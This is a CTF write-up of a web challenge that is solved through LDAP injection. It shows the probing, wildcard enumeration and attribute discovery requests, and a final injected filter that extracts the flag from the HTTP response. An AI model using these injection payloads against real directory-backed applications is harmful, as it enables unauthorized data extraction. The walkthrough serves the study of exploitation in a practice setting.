Tags: web ldap
Rating: 5.0
# ▼▼▼Dictionary of obscure sorrows(Web:902point、11/531=2.1%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
There are a lot of obscure sorrows in our world.
Your job is not to find those that are plain in sight;
You need to seek further, look deeper.
Find the word that can not be written.
The most obscure sorrow of them all.
http://54.152.220.222/
```
---
## 【Identify the vulnerability】
```
GET /word.php?page=*)(ObjectClass=* ⇒Normal response!!
GET /word.php?page=*)(ObjectClass=1 ⇒Query returned empty
```
↓
**LDAP injection !!**
---
## 【Search for flag】
```
GET /word.php?page=%4b*)(objectClass=* HTTP/1.1 K*
GET /word.php?page=%6b*)(objectClass=* HTTP/1.1 k*
GET /word.php?page=%4f*)(objectClass=* HTTP/1.1 O*
GET /word.php?page=%6f*)(objectClass=* HTTP/1.1 o*
GET /word.php?page=%56*)(objectClass=* HTTP/1.1 V*
GET /word.php?page=%76*)(objectClass=* HTTP/1.1 v*
GET /word.php?page=%57*)(objectClass=* HTTP/1.1 W*
GET /word.php?page=%77*)(objectClass=* HTTP/1.1 w*
GET /word.php?page=%41*)(objectClass=* HTTP/1.1 A*
GET /word.php?page=%61*)(objectClass=* HTTP/1.1 a*
GET /word.php?page=%4c*)(objectClass=* HTTP/1.1 L*
GET /word.php?page=%6c*)(objectClass=* HTTP/1.1 l*
GET /word.php?page=%53*)(objectClass=* HTTP/1.1 S*
GET /word.php?page=%73*)(objectClass=* HTTP/1.1 s*
GET /word.php?page=%59*)(objectClass=* HTTP/1.1 Y*
GET /word.php?page=%79*)(objectClass=* HTTP/1.1 y*
```
↓
Compare with values that exist in html
↓
```
/word.php?page=Koinophobia
/word.php?page=Klexos
/word.php?page=Kuebiko
/word.php?page=Onism
/word.php?page=Opia
/word.php?page=Vellichor
/word.php?page=Wytai
/word.php?page=Anemoia
/word.php?page=Ambedo
/word.php?page=Lalalalia
/word.php?page=Lachesism
/word.php?page=Lutalica
/word.php?page=Sonder
/word.php?page=Socha
/word.php?page=YuYi
```
↓
```
Discover WORDS!! But it was not a flag...
/word.php?page=WORDS
```
---
## 【Search for other attribute values】
`GET /word.php` or `GET /config.php` ※config.php was discovered by the feeling
↓
`Missing RDN inside ObjectClass(document)`
↓
ObjectClass is `document`
---
## 【Investigate attributes of ObjectClass】
Attribute list of `document`
↓
`http://software.fujitsu.com/jp/manual/manualfiles/M050000/B1WN4901/02/irepac/irep0289.htm#document`
↓
```
cn (commonName)
description
seeAlso
l (localityName)
o (organizationName)
ou (organizationUnitName)
documentTitle
documentVersion
documentAuthor
documentLocation
documentPublisher
```
---
```
GET /word.php?page=*)(cn=* ⇒ Query returned empty
GET /word.php?page=*)(description=* ⇒ Normal response★
GET /word.php?page=*)(seeAlso=* ⇒ Query returned empty
GET /word.php?page=*)(l=* ⇒ Query returned empty
GET /word.php?page=*)(o=* ⇒ Query returned empty
GET /word.php?page=*)(ou=* ⇒ Query returned empty
GET /word.php?page=*)(documentTitle=* ⇒ Query returned empty
GET /word.php?page=*)(documentVersion=* ⇒ Query returned empty
GET /word.php?page=*)(documentAuthor=* ⇒ Query returned empty
GET /word.php?page=*)(documentAuthor=* ⇒ Query returned empty
GET /word.php?page=*)(documentPublisher=* ⇒ Normal response★
```
---
## 【exploit】
The format of flag is known by `noxctf{●●●●●} `
`GET /word.php?page=*)(description=*noxctf*`
↓
```
HTTP/1.1 302 Found
Date: Sat, 08 Sep 2018 23:41:20 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: http://54.152.220.222/
Content-Length: 3872
Content-Type: text/html; charset=UTF-8
<html><head>
<title>Lightweight Dictionary Of Obscure Sorrows</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="/assets/css/main.css">
</head>
<body class="subpage">
<header id="header">
<h1>Dictionary of <span>Obscure Sorrows</span></h1>
Menu
</header>
<div id="main">
<section class="wrapper style1">
<div class="inner">
<header class="align-center">
<h2>ƢƢƢƢ</h2>
So many sorrows.
noxCTF{K1NG_0F_LD4P}
<section class="wrapper ">
<div class="inner">
<header class="align-center">
<h2>Even more obsure sorrows</h2>
You can click on any of the links below to reach some more interesting words.
</div>
<footer id="footer">
<div class="inner">
<div class="flex flex-3">
<div class="col">
<h3>Words</h3>
<script src="/assets/js/jquery.min.js"></script>
<script src="/assets/js/jquery.scrolly.min.js"></script>
<script src="/assets/js/skel.min.js"></script>
<script src="/assets/js/util.js"></script>
<script src="/assets/js/main.js"></script>
<nav id="menu">
↓
`noxCTF{K1NG_0F_LD4P}`